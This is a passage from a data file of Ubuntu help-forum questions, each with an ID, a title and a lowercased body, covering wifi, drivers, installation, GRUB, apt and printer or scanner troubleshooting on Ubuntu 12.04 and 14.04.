00:00:00 /sbin/wpa_supplicant -s -b -p /var/run/wpa_supplicant.wlan0.pid -i wlan0 -d nl80211 , wext -c /var/run/wpa_supplicant iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed frequency:2.447 ghz access point : not-associated tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off a further cycle of ifup ifdown wlan0 finally brings up wlan0 despite an error message denying it , but fails to add a default route for wlan0 and so the net remains unpingable through that interface . ip route default via 192.168.0.1 dev eth0 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.102 192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.12
514560	huawei e3276 lte uplink slow in the routing ubuntu , but not with other devices in the lan	i have a huawei e3276 lte dongle ( 12d1:14fe - > 12d1:1506 ) and a problem with the upstream speed . the problem is not only present with ubuntu 14.04 lts ( 64 bit workstation , kernel 3.16 ) , but also with raspbian jessie for raspberry pi ( kernel 3.14 ) . upstream seems to be always limited to 5 mbit/s whenever i check the speed from the linux computer that i use as a lte router . the other computers in the lan always get about 10-15 mbit/s upstream , even though the traffic is routed through the same linux computer suffering from seemingly capped uplink . downstream speed is always fine , 25 mbit/s . i even installed windows 7 in the same computer as ubuntu and the speeds are 25 mbit/s down , 15 mbit/s up . so the problem is not with e3276 device itself or in the mobile subscription , but in the huawei e3276 linux compatibility . maybe something in the kernel ? i have made sure that the matter is not with iptables rules : the speed does not noticeably increase when iptables is disabled . turning off ipv4 forwarding does not improve speed either . i 'm not sure what settings and logs do help in debugging the situation . please ask for more details , if you have a clue what might be wrong . thanks , mytomi
514563	install graphics drivers	how do i install nvidia geforce gtx 610 drivers in ubuntu 14 ? i 've installed on vmware running on windows 7 . i have already tried downloading and installing from ubuntu websites , but files which i downloaded always say version mismatch .
514564	14.04 wifi disconnects every 10 seconds or so	when ever i use my home wifi on my laptop 's internal wireless card , it disconnects every 10 or 20 seconds and presents the window to enter the password again . it is fine when i use a hard wired connection , different network or if i use a different device ( e.g . android phone ) . any idea what 's causing this or how i could stop it would be greatly appreciated . thanks in advance , uks2
514566	how do i start installing xbuntu 14.04 ?	ive downloaded the .iso which is too large for a cd , so im unclear what im meant to do with it ( can not find any instructions on the xbuntu website ) , do i just copy the iso to a usb stick ? i do n't currently have a linux machine but i do have a windows and apple mac machines .
514573	warning triangle in ubuntu software center	i am using ubuntu 14.04 . while installing certain softies , my ubuntu software center shows a warning triangle . here is an example : so , there it is like this what does this mean ?
514575	adobe flash player installation on 12.04	hiiii , please let me how to install adobe flash player plugin on ubuntu 12.04 from command prompt . have already tried these below steps without any success . sudo apt-get install ubuntu-restricted-extra sudo apt-get install flashplugin-nonfree sudo apt-get install flashplugin-installer sudo apt-get install adobe-flashplugin sudo apt-get install xubuntu-restricted-extras trying to make a image of ubuntu using uck with flash player plugin installed .
514576	ubunto download and install	how do i download ubuntu onto a usb stick and can i then install alongside windows 7 . or is it better to boot from the usb .
514578	getting url of youtube video with `youtube-dl` is slow , without downloading video	i want to get the url using youtube-dl , and the `` simulate '' option -g that does not download the video . so i gave the following command : youtube-dl -g https : //www.youtube.com/watch ? v=k4jgsamu4lg it gave the following output after 7 to 8 seconds https : //r20 -- -sn-cvh7zn7d.googlevideo.com/videoplayback ? initcwndbps=1113000 & mt=1408702970 & requiressl=yes & ipbits=0 & sver=3 & fexp=901454 % 2c902408 % 2c919145 % 2c924626 % 2c927622 % 2c927904 % 2c931330 % 2c931983 % 2c934024 % 2c934030 % 2c934804 % 2c945118 % 2c945308 % 2c946023 % 2c951914 & ratebypass=yes & signature=38f111d46d72ffc50b47d50b3c9a631099bf5f83.fa134c91f407989b95acadc1f1f6946b8f18c158 & upn=tu0u5t7a2uw & sparams=id % 2cinitcwndbps % 2cip % 2cipbits % 2citag % 2cmm % 2cms % 2cmv % 2cratebypass % 2crequiressl % 2csource % 2cupn % 2cexpire & mm=31 & expire=1408724634 & id=o-ajnpudp9tkmkiwzuwvsk76w7jda0cx0brsum9mpjj7vo & mv=u & source=youtube & ms=au & key=yt5 & ip=115.113.1.50 & itag=18 but the problem is it is taking around 7 to 8 seconds for querying the url . is there any way so that it can be faster ?
514579	saitek p380 gamepad 14.04 64bit	i have found a saitek p380 gamepad and would greately like to use it on my ubuntu 14.04 64bit computer . i have looked on the saitek website for drivers to run through wine but to no avail . if you really want specifics then i would like it to play 2 player steam games such as portal 2 . thanks in advance !
514581	how can i configure the xserver config file	i recently purchased an amd r9 280 and i want to integrate it in my system . it seems like i have to cofigure the xserver so how can i do that . i already createt the config file in the root shell but when i enter this command : gksudo gedit /etc/x11/xorg.conf to open it in gedit my pc crashes . then i tried to open it in nano ( that is an editor without gui ) like that : sudo nano /etc/x11/xorg.conf and it showed that it had opened it but it was empty , no text appared . what did i do wrong ? i am using ubuntu 14.04 64-bit .
514582	google chrome not working in ubuntu server ( karma )	i am using ubuntu 14.04 i trying to run the test $ ./scripts/test.sh but i am getting starting karma server ( http : //karma-runner.github.io ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - info [ karma ] : karma v0.12.16 server started at http : //xx.xx.xx:9876/ info [ launcher ] : starting browser chrome error [ launcher ] : can not start chrome info [ launcher ] : trying to start chrome again ( 1/2 ) . error [ launcher ] : can not start chrome info [ launcher ] : trying to start chrome again ( 2/2 ) . error [ launcher ] : can not start chrome error [ launcher ] : chrome failed 2 times ( can not start ) . giving up . please help to fix it . please refer screenshot also
514583	ubuntu flash only working on youtube	there are lots of question on this topic , but my problem is little bit weird . i do n't know whether other people are facing same issue . i have ubuntu 14.04 freshly installed . i installed flash player , but flash videos/audios are only working for youtube and facebook . other websites like 8tracks , gaana.com etc . flash player is not working . my flash version 11.2.202.400
514585	where is the likewise configuration file ?	i am trying to find the configuration file which defines the likewise prefix domain , but i ca n't find it . where is it located ?
514589	changing directory of binaries after compiling	i have downloaded a package which includes a makefile . can i compile the program in the downloaded directory and then move the binaries elsewhere to use ?
514591	how to install the scanner of canon mf4750 multi-device ?	i am using 32 bit ubuntu 12.04 lts and bought a canon i-sensys mf4750 printer + scanner + fax . there is a driver on the official canon homepage only for the printer , and that works fine . but i need the scanner too ... the scanner is not recognized automatically ( i connect it by usb ) . i installed sane , but still does n't work ( i followed the steps here : https : //help.ubuntu.com/community/sane % 20- % 20installing % 20a % 20scanner % 20that % 20isn % 27t % 20auto-detected when i type sane-find-scanner than it finds it as follows : found usb scanner ( vendor=0x04a9 , product=0x2774 ) at libusb:002:005 but when i try to scan ( simplescan , xsane , scanimage ... ) it just does not work ( no scanner ) . how can i get to work it ? how can i get a driver for this scanner ( probably sane is not supporting my model ) ? please write in very simple way , i have very poor knowledge about linux systems ... : ) thanks' al
514592	how to share wifi/hotspot over ssh tunnel	i have created a ssh tunnel on my laptop connected to lan . i want to share the internet via wifi/hotspot , but over the ssh tunnel . i mean any computer using this wireless should connect to the internet via the ssh tunnel . is there any method or program to create a wireless hotspot which connects via ssh tunnel .
514593	ubuntu 14.04 : hibernate consumes power	upgraded from 12.04 to 14.04 ( not new install ) . in 14.04 , enabled display of hibernate choice in power menu . this works as well as pm -hibernate . followed the steps in http : //blog.mafr.de/2014/05/01/enabling-hibernate-support-in-ubuntu-14-04/ laptop hibernates and restores from hibernation . however , consumes battery power when in hibernation . not the case with 12.04 . please advise .
514596	disable system shortcut for a single application	when i use emacs , i want to be able to use c-q ( quoted-insert ) . however when i do that in unity , the program quits since c-q is the system-wide shortcut i set for closing a window . i want to keep c-q active for all programs but emacs , for which i want it disabled . i recall from the time i had windows at work that autohotkey allowed to redefine ( and disable ) shortcuts for applications separately , and to override the possible system behavior of such shortcuts . it is something similar i want here . note : autokey does not seem to preempt ctrl+q from the sytem ( beside not pasting text at all , at least in my 14.04 ) .
514598	alternative to cold turkey or selfrestraint	to get more work done i have to block a lot of distractions like reddit , etc . im looking for a good alternative to cold turkey on windows or self restraint . self restraint could work but the site is down so i do n't know how to get my hands on it..
514601	unable to connect internet to xubuntu 14.04 with wired connection	just installed xubuntu 14.04 from usb , installed okay except that i can not connect to internet . i 'm connected via a solwise homeplug ( ethernet over wiring ) . xubuntu says i have 'wired connection 1 ' but 'ethernet network ' is greyed out ipconfig lists a section for 'etho ' and 'lo' i have a mac and a pc connected to the same homeplug and their internet connection is fine during installation it also complained i have no internet access . previously i was running xubuntu 12.10 and that was working fine until yesterday when it also lost internet connection and then would n't start after reboot . it is for this reason that i installed xubuntu 14.04 figuring a new installation would resolve the problem .
514605	just re-installed ubuntu 14.04 , unstable wireless connection , lenovo thinkpad x200	i re-installed ubuntu 14.04 as i was having problems with unstable wireless connection ... following re-installation i am having the same problem : connection randomly dropping out , then reconnecting ... all my other devices are running well when connected i am a bit of a computer novice so any help would be greatly appreciated ... i am running lenovo thinkpad x200 laptop ... thanks ! mark @ mark-thinkpad-x200 : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:03.0 communication controller : intel corporation mobile 4 series chipset mei controller ( rev 07 ) 00:19.0 ethernet controller : intel corporation 82567lm gigabit network connection ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m-e lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 03:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection mark @ mark-thinkpad-x200 : ~ $ mark @ mark-thinkpad-x200 : ~ $ lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 026 : id 0a5c:2145 broadcom corp. bcm2045b ( bdc-2.1 ) [ bluetooth controller ] bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub mark @ mark-thinkpad-x200 : ~ $
514607	number of entries in the file	i have json-file with the entries in the dictionary format ( actually strings ) . what is the terminal order in linux , which get me the full number of entries back ?
514608	what is the difference between installing a program and copying a program 's binaries to some directory ?	sometimes it is sufficient for a program to use , to extract its tarball and compile the makefile , but some programs need also to be installed . i guess , install process involves copying files to some specific directories and modifying some configuration files . my question is , how can one tell , if a program needs to be installed , and which directories and configuration files should be involved in that case .
514609	ubuntu 14.04 is not installing	i downloaded image file of ubuntu 14.04 ( 64-bit ) from the website . i made a bootable dvd from that file and tried to install it . but the installation process was terminated and a window displayed a message that there is some problem with the cd/dvd or the hard disk . but when i booted ubuntu 12.04 from same kind of dvd on the same drive , it got installed properly . i am not able to understand what is the problem . can somebody help ?
514615	encryption question	using ubuntu 14.04lts . home directory is encrypted . dropbox is in 'home ' directory . therefore , is dropbox encrypted ? or , should dropbox 's method of encryption be used ? also , if files from 'home ' directory are stored in other clouds , are they encrypted ?
514616	can not install sflphone-gnome-video on ubuntu 12.04	i am running ubuntu 12.04 ( precise ) ( 64-bit ) just added the repository : ppa : savoirfairelinux : http : //ppa.launchpad.net/savoirfairelinux/ppa/ubuntu precise main but i can not install sflphone-gnome-video ( the package can not be found ! ) . only sflphone-gnome ( audio only ) installed .
514621	getting error with sudo apt-get update ?	as i go into terminal with ubuntu 12.04 64 bit . i type in `sudo apt-get update . i enter in the required password . the termianl with process the request toward checking if there are any updates ! as it get 's down to the final conclusion of how long it took to process , i get this error . here is a picture of the error ! i do n't understand the error ! i do n't have a w : drive ! i have seen this error with many users , but i can not fix this error ! if you have a good fix for this error , i would appericate the advice and solution ! thanks
514623	how to enable vt-x in a dual-booted computer ?	how to enable vt-x in a dual-booted computer because i want to install a windows 8.1 virtual machine . my oses are : ubuntu 12.04 and ubuntu 14.04 . my coputer brand is toshiba and coputer model is satellite c660-1dg . i already enabled vt-x and it shows : virtualization technology [ enabled ] . and i installed virtualbox and vmware workstation 10 on ubuntu 12.04 . i use virtualbox on ubuntu 12.04
514624	how to backup the root-partition without the home partition	i 'm looking for a terminal-command or maybe gui-programm to backup my root-partition ( on a running system ) without the included home-folder ( on extra partition ) . the whole disk is encrypted and also the home-folder ( as recommended on new 14.04 installation ) . for me it 's usefull to backup my home-folder every day and the system only sometimes , if important things have changed . is this possible ?
514625	how to download video from youtube in 14.04	i have given the following link from which i supposed to download a video . https : //www.youtube.com/watch ? v=ta1msewa6wk
514626	boot issue after cy with dd command ( error : file '/boot/grub/i386-pc/normal.mod ' not found )	i 'm running ubuntu through a 16gb usb having one partition for the os and one dedicated for swap and all is working well . i wanted to make a copy of this usb key to a 32gb key to increase the potential size . i 've made a dd command : dd if=/dev/sda of=/dev/sdb it seems working well . for what i 've seen , the dd command copy the partition and also the mbr . anyway , with the new key , i got at the boot : ( error : file '/boot/grub/i386-pc/normal.mod ' not found ) . could anyone help me ... thanks in advance .
514627	when i try to download anything from terminal i have this	e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
514628	problems restoring grub	i have used fsarchiver to move the content of my old hard drive on a new bigger ssd . basically , one partition with ubuntu 12.04 . everything went fine . but now i can not boot . i used gpt and i also made a smaller partition fat32 in which i am trying to install grub , with no success . i am , honestly , confused and not sure about what to do . any help will be highly appreciated ! ! thanks in advance .
514629	office 2010 install in spanish ubunt 14.04 using playonlinux	i am trying to install office 2010 in ubuntu 14.04 using playonlinux . the installation worked without any problem , but the thing is that office is installed in spanish , for some reason . i tried reinstalling it with another iso file ( which i downloaded using transmission ) but it was spanish again . when i installed office with the same file i downloaded in windows it was installed in english , so i think it has to be something concerning playonlinux . so , how can i fix this ? thanks for answering !
514637	how do i get canon pixma mg5500series scanner to work ?	i am completely new to linux . i am using zorin os , which seems to be a variant of lubuntu . if i am mistaken , please let me know and i will not bother ask ubuntu anymore . i successfully installed printer driver from canon 's website , and it works perfectly , usb and wlan . however , the scanner driver - scangear - is giving me a hard time . i install packages that canon suggests ( at least i think i do ) , but then nothing happens . simple scan does n't work . xsane does n't work . this is the canon 's website for my model and make : http : //www.canon-europe.com/support/consumer_products/products/fax__multifunctionals/inkjet/pixma_mg_series/pixma_mg5550.aspx ? type=download & language=en & os=linux please help me , if you can . thanks !
514640	kubuntu 12.04.4 usb installation fails	when i insert and boot my usb stick with kubuntu 12.04.4 on it , it shows me the screen `` try kubuntu '' / '' install kubuntu '' . then i click on the first one , the graphic goes away and sends me on a command-line prompt . i checked the file xorg.0.log for more info , and it tells me `` fatal error : no screen found '' . there are some modules ( `` vesa '' ) that it 's unable to load . and this is the best thing happened . i tried several other distros : debian , centos , mint debian , kubuntu 14.04 ... no one works , and i 'm going mad . with debian , i tried installing firmware-linux-nonfree package , but still wo n't work . i have an hp notebook with ati radeon hd 7400g as a video card . thanks everyone in advance .
514647	youtube video in ubuntu 14.01lts	i wanted to download youtube video in ubuntu 14.04lts.i do n't know how to proceed.can anyone help me out ? here is the following link : https : //www.youtube.com/watch ? v=ta1msewa6wk
514653	apt-get upgrade goes to an infinite loop while downloading stuff	my ubuntu 12.04 installation ( yes i do n't want to upgrade just yet ) is giving me trouble updating . this has been happening for more than a week . i run apt-get update no problems but when i run apt-get upgrade it keeps on re-downloading the same many times and i ca n't get any updates anymore e.g . how can i fix this ? azg @ olympus : ~/code/rm/debug $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-7-jre-jamvm libsvn1 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openjdk-7-dbg openjdk-7-doc openjdk-7-jdk openjdk-7-jre openjdk-7-jre-headless openjdk-7-source subversion 14 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 320 mb/329 mb of archives . after this operation , 6,309 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:2 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:3 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:4 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:5 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:6 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:7 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:8 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:9 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:10 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:11 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:12 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:13 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:14 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:15 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:16 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:17 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:18 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:19 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] get:20 http : //ch.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jdk amd64 7u65-2.5.1-4ubuntu1~0.12.04.1 [ 16.5 mb ] 5 % [ 20 openjdk-7-jdk 16.4 mb/16.5 mb 99 % ]
514654	ubuntu 12.04 apt-get installs older version of software	i 'm using a software called vcftools which is present in ubuntu repositories . when i sudo apt-get install vcftools in my ubuntu 14.04 , i get an up-to-date version ( v0.1.11 ) , whereas when i do the same on an ubuntu 12.04 server , i get a really old version ( v0.1.7 ) of the software . is there a way to get a newer version of vcftools on ubuntu 12.04 using apt-get ?
514656	how do i enlarge the menu bottons ?	i want the menu buttons ( close , minimise , and restore/maximise ) to be bigger so that they 're more visible and the clickable area is bigger too . if that includes increasing the size of the entire menu bar itself , then i 'm up for it .
514660	problem with ssd , can| delete raid data	i 'm trying to install ubuntu on my ssd drive . the bootloader ca n't find it but the bios does . from other questions i got that i have to delete the raid metadata which are definitely on the ssd cause i checked it with fdsik -l where the ssd was available . now i tried to use sudo dmraid -e -r /dev/sdb which gave me do you really want to erase `` ddf1 '' ondisk metadata on /dev/sdb ? [ y/n ] entering yes i got the error : error : ddf1 : seeking device `` /dev/sdb '' to 92183432265728 error : writing metadata to /dev/sdb , offset 180045766144 sectors , size 0 bytes returned 0 error : erasing ondisk metadata on /dev/sdb what could i do to get this command working ? thanks !
514661	should i make executable text file or a .desktop one ?	i 'm new to this and ca n't quite wrap my head around it . i want to run specific firefox profile which , so i just put this line in a text file : firefox -p profile make it executable and run it . it works fine . now what advantages i gain if i make a .desktop file that has in the command line basically the same ? other than the option to set an icon and add it to the launcher ? are there any fundamental differences ?
514663	connecting to a cups server	i 'm probably missing something entirely obvious , but here goes anyway . i 'm trying to connect my ubuntu desktop to a cups print server . i go to printers menu , click connect and enter the server address . all the printers connected to the server show up in the printers menu so everything seems to work . however , when i try to print from some application ( say , document reader ) , i only see the local printers in the printing menu without an option to use one of the server printers . how can i make the printers shared from the server to appear when i print from some application ?
514668	ubuntu 14.04 freezes after it goes to sleep	whenever i leave my laptop idle for more than an hour it freezes . the mouse pointer disappears . however the keyboard and the power button works . and because of that i am able to safely shutdown my laptop by pressing the power button and then selecting shutdown using my keyboard arrow keys . what should i do in order to remove this touchpad problem ?
514670	installing ubuntu !	so i am trying to make the switch from windows 8 to ubuntu . i am sick of windows 8 and i want to start fresh and learn a new os . but i need help . apparently making the switch seems like a rather complicated process . my computer is pre-installed with windows and it also does not have a disc drive . any guidance here would be greatly appreciated !
514674	just upgraded to ubuntu 14 ... wo n't start up	hi i have a pretty nice computer that i just built and it has been on ubuntu 13.10 for a while but today when i tried to upgrade it to 14.04 , everything went fine until the system rebooted . now my monitor is just stuck on the `` ubuntu '' screen and the loading dots are just red and are n't doing anything . the only time they seem to move is when i restated the system to try again . any ideas ? ? edit : after i hit `` up arrow '' when the dots appeared the last line says `` saned disabled ; edit ... '' but i ca n't get it to say this again , every time i do this the script only shows for a matter of seconds and then the screen goes black
514675	how to change libcupsys2 to libcups2	i tried to install my canon pixma ip2600 in ubuntu 14.04 using the offical driver from canon . i can not change the libcupsys2 to libcups2 , so i get a failure ... .
514676	why does a program need 64mb to install but frees up 3.5 mb when it is removed later in ubuntu ?	okay , i installed a 64mb sized program . now i 'm trying to uninstall it using terminal : sudo apt-get purge < program-name > after running that command , the confirmation message will be : blah blah blah ... the following packages will be removed : < program-name > * after this operation , 3,577 kb disk space will be freed . do you want to continue ? [ y/n ] now my question is what the hell is happening here ? ! 64mb on installation , then 3.5mb after uninstalling ? ? ? !
514679	problems with dependencies do n't allow configuration of postgresql-9.3	i have a problem with do-release-upgrade : configurazione di postgresql-client-9.3 ( 9.3.5-0ubuntu0.14.04.1 ) ... update-alternatives : errore : l'alternativa pg_basebackup.1.gz non può essere slave di psql.1.gz : è slave di postmaster.1.gz dpkg : errore nell'elaborare il pacchetto postgresql-client-9.3 ( -- configure ) : il sottoprocesso installato script di post-installation ha restituito lo stato di errore 2 dpkg : problemi con le dipendenze impediscono la configurazione di postgresql-9.3 : postgresql-9.3 dipende da postgresql-client-9.3 ; comunque : il pacchetto postgresql-client-9.3 non è ancora configurato . dpkg : errore nell'elaborare il pacchetto postgresql-9.3 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di postgresql : postgresql dipende da postgresql-9.3 ; comunque : il pacchetto postgresql-9.3 non è ancora configurato . dpkg : errore nell'elaborare il pacchetto postgresql ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di postgresql-client : postgresql-client dipende da postgresql-client-9.3 ; comunque : il pacchetto postgresql-client-9.3 non è ancora configurato . dpkg : errore nell'elaborare il pacchetto postgresql-client ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di postgresql-contrib-9.3 : postgresql-contrib-9.3 dipende da postgresql-9.3 ( = 9.3.5-0ubuntu0.14.04.1 ) ; comunque : il pacchetto postgresql-9.3 non è ancora configurato . dpkg : errore nell'elaborare il pacchetto postgresql-contrib-9.3 ( -- configure ) : problemi con le dipendenze - lasciato non configurato dpkg : problemi con le dipendenze impediscono la configurazione di postgresql-contrib : postgresql-contrib dipende da postgresql-contrib-9.3 ; comunque : il pacchetto postgresql-contrib-9.3 non è ancora configurato . dpkg : errore nell'elaborare il pacchetto postgresql-contrib ( -- configure ) : problemi con le dipendenze - lasciato non configurato si sono verificati degli errori nell'elaborazione : postgresql-client-9.3 postgresql-9.3 postgresql postgresql-client postgresql-contrib-9.3 postgresql-contrib any idea ?
514680	my ubuntu ca n't see wlan0 adapter	i have thinkpad r400 laptop , ( all wireless connections switch turned on > allowing ) and on windows it works . yesterday , was powering ubuntu off about 5 minutes ( ubuntu logo and dots , and dots not moving & almost 1 minute took from click on `` shutdown '' and that ubuntu logo , no apps/servers running , and meanwhile ( in that 1 min ) i issued one sudo halt ) , and after it , i shut it down by hard way . ifconfig sees only local loopback and ethernet .
514684	why wo n't my android sdk manager show up when invoked from eclipse ?	on ubuntu 12.04 , i 'm running the eclipse ide with the standalone android sdk plugins installed . i 'm using it this way instead of using the adt bundle because i 'm also using eclipse for other code . if i try to invoke the android sdk manager from the eclipse window menu , then i get the happy message about `` sdk manager will show up shortly ... '' , but when that status window goes away , the sdk manager has not , in fact , started . i do have a workaround , for now . if i open a terminal window and invoke the tool directly ... > > /opt/android-sdk-linux/tools/android the sdk manager happily opens . no errors are returned . changes to the android sdk environment made here persist and function as expected . while this works , it 's strange and spooky ; i 'd rather have it also work within the ide . as a nicer workaround , i tried constructing a gnome .desktop file to invoke the executable directly , but when i try to use that , nothing happens , and no errors are visible . even stranger , the android virtual device manager works just fine when invoked from within eclipse . only the sdk manager is affected by this ... whatever it is . i have seen elsewhere that the android tools might require java 6 , but i ca n't change eclipse 's java path in eclipse.ini without also clobbering use of java 7 in the rest of eclipse , so this does n't seem like a viable option . what else can i try , or what am i missing , that would make the sdk manager behave in eclipse ? and before i get flagged as a duplicate of the following questions , i 've already read them and tried some things without success : android sdk manager not showing up ( ubuntu ) i already installed the official oracle jdks and do n't want to mess with installing the openjdk again and dealing with conflicts , etc . problem in opening sdk manager in eclipse all my paths are set correctly , and i do n't get any errors when invoking from the terminal . android sdk manager not opening i do n't get an error message on the terminal .
514687	login to software center problem	i really do n't know what 's happening . when i try to sign up to post comments , it says email is already registered and then when i try to login and click forgot password ( i really have ) , it says we ca n't recognize your email address . what is happening ? ?
514688	how to keep my logitech headset configuration persistent ?	hello dear ubuntu people , i have a logitech h390 usb headset . i plugged it into my laptop with kubuntu 14.04 . it took some work to have ubuntu recognize it correctly , but eventually it did . however every time i logout , hibernate the computer and unplug the headset and then i wake up the computer back and plug in the headset again , the operating system has troubles in recognizing the headset . it sometimes configures the headset as if it were an output-only device ( headphones ) then i unplug it and plug it in several times and randomly the operating system sees it as if it were an input-only device ( mic ) . i keep doing so until eventually the operating system recognizes the headset as a duplex ( input-output ) device . i wonder if there is a way to make this configuration persistent so that every time i plug my headset in , i do n't need to strive to make it work . i 'll appreciate any help . best regards ! ber
514689	cp command `` loud '' version	is there any way , to make cp - command `` loud '' ? sometimes i want copy large file , or directory with many files . it is very useful , to see what cp is doing right now , which file , % of this file or % of all copy procedure . when i apt-get something , i got information about every package it is downloading , unpacking , installing ... i can turn it off with -q ( quiet ) flag . is there any way to make opposite thing to cp ? i ca n't find it on man page .
